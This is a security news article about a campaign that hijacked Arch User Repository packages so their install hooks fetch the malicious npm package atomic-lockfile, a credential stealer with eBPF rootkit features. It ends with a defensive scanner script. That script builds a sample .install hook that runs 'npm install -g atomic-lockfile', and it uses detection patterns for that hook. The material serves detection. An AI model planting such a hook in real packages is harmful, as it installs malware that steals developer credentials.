Compromised Arch Linux Packages Distribute Malware
A recent report from the Independent Federated Intelligence Network (IFIN) reveals that more than 400 packages in the Arch User Repository (AUR) have been compromised to distribute a Linux rootkit and infostealer malware. This malware targets credentials and access tokens, posing a significant threat to users of the Arch Linux distribution.
The AUR is a community-maintained repository that provides the latest versions of software, drivers, and the kernel for Arch-based distributions. However, it is not a vetted space, and threat actors can use it to push malware through packages that change ownership without anyone noticing.
Malicious Packages and Scripts
According to IFIN member Michael Taggart, the compromised packages are modified with preinstall scripts that download and execute a malicious npm package called atomic-lockfile. Independent security researcher Whanos notes that one sample of atomic-lockfile included a Linux ELF payload named deps, which was a "credential stealer with optional root-only eBPF [extended Berkeley Packet Filter] rootkit capabilities."
The payload is built for developer workstations and build environments. It targets browser and Electron application data, Slack, Microsoft Teams, Discord, GitHub, npm, Vault, Docker/Podman, SSH, VPN material, shell histories, and other local developer secrets.
Where it can obtain root, the malware uses eBPF to load code into the kernel and hide local processes. Supply-chain management company Sonatype also published a report on a campaign targeting the AUR and delivering the same malicious atomic-lockfile npm package, but using a different method.
Method of Compromise
Sonatype researchers say that the threat actor hijacked at least 20 orphaned packages on AUR and pushed atomic-lockfile by modifying the PKGBUILD file, a Bash script with the build information needed by Arch Linux packages. The attacker added a post-install script to invoke npm and retrieve the malicious package.
- The modified packages add a post-install script that invokes npm and installs atomic-lockfile during package installation.
- The npm package installed a Linux executable with references to an eBPF rootkit that could hide processes, files, and network interfaces.
- The Linux binary indicates that it has infostealer functionality, targeting the following types of sensitive information:
  - GitHub credentials
  - SSH artifacts
  - HashiCorp Vault tokens
  - Browser cookie databases
  - Slack data
  - Discord data
  - Microsoft Teams data
  - Telegram data
Sonatype determined that the binary can archive data, handle multi-part files, and perform HTTP uploads, so the functionality for a typical exfiltration mechanism is present.
Response and Recommendations
AUR maintainers are working to identify and remove all malicious commits, and to ban the accounts pushing them. In a message to the community, Arch Linux package maintainer Jonathan Grotelüschen urged users to report any malicious package they find.
As a general rule, it’s recommended to only trust projects with frequent updates and an active community around them. Arch users are advised to review the list of affected packages and look for the indicators of compromise provided in the report from Whanos. Michael Taggart also pointed to a script that checks for the atomic-lockfile malware on the system.
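The compromise method above (an install hook added to a PKGBUILD or its companion .install file that calls npm to fetch atomic-lockfile) is something a user can check for before running makepkg. The script below is an added example written for this article; it is not Taggart's check script, not the Whanos IoC list, and not an Arch project tool. It scans a package directory for the npm package name named in the report and for any npm or npx call placed inside an install hook function (pre_install, post_install, pre_upgrade, post_upgrade, pre_remove, post_remove), while leaving npm use inside build() or package() alone, since legitimate Node.js packages build that way. The two sample packages it creates are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not from the article or the AUR project. Scans a package
# source directory (PKGBUILD plus any *.install files) for the pattern the
# report describes: an install-time hook that runs npm to pull atomic-lockfile.

# Print every npm/npx invocation that sits inside an install hook function.
# npm in build()/package() is normal for Node.js packages and is not reported.
npm_in_hooks() {
    awk '
        /^(pre_install|post_install|pre_upgrade|post_upgrade|pre_remove|post_remove)[ \t]*\(\)/ { inhook = 1 }
        inhook && /(^|[^A-Za-z0-9_])(npm|npx)([ \t]|$)/ { print FILENAME ":" NR ": " $0 }
        inhook && /^}/ { inhook = 0 }
    ' "$1"
}

# Scan one package directory. Prints each finding; returns 0 when nothing
# suspicious was found and 1 otherwise, so it can be used in a shell condition.
scan_pkgdir() {
    dir="$1"
    findings=0
    for f in "$dir"/PKGBUILD "$dir"/*.install; do
        [ -f "$f" ] || continue
        # Direct mention of the npm package named in the report.
        if grep -n 'atomic-lockfile' "$f"; then
            findings=$((findings + 1))
        fi
        # Package installation should never reach out to a registry.
        hits=$(npm_in_hooks "$f")
        if [ -n "$hits" ]; then
            echo "$hits"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}

# Constructed sample packages for the demonstration (not real AUR packages).
DEMO_DIR=$(mktemp -d)
trap 'rm -rf "$DEMO_DIR"' EXIT
mkdir -p "$DEMO_DIR/clean" "$DEMO_DIR/suspect"

# Benign: npm is only used while building, inside package().
cat > "$DEMO_DIR/clean/PKGBUILD" <<'EOF'
pkgname=example-tool
pkgver=1.0.0
pkgrel=1
source=("https://example.invalid/example-tool-1.0.0.tgz")
package() {
  npm install -g --prefix "$pkgdir/usr" "$srcdir/example-tool-1.0.0.tgz"
}
EOF

# Suspect: the PKGBUILD looks harmless, but the referenced .install file
# adds a post_install hook that fetches the npm package named in the report.
cat > "$DEMO_DIR/suspect/PKGBUILD" <<'EOF'
pkgname=example-tool
pkgver=1.0.0
pkgrel=2
install=example-tool.install
package() {
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
}
EOF
cat > "$DEMO_DIR/suspect/example-tool.install" <<'EOF'
post_install() {
  npm install -g atomic-lockfile
}
EOF

if scan_pkgdir "$DEMO_DIR/clean"; then
    echo "clean: no findings"
fi
if ! scan_pkgdir "$DEMO_DIR/suspect"; then
    echo "suspect: review this package before installing it"
fi
```

To use it on a real checkout, replace the sample directories with the directory produced by `git clone` of the AUR package and run `scan_pkgdir` on it. The hook-function check is the useful part: a package name can change, but an install hook that contacts a package registry is out of place in any PKGBUILD.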
If compromised packages are found, users should rotate all credentials and consider reinstalling Arch from scratch, since a rootkit may survive normal cleaning efforts.
Source: BleepingComputer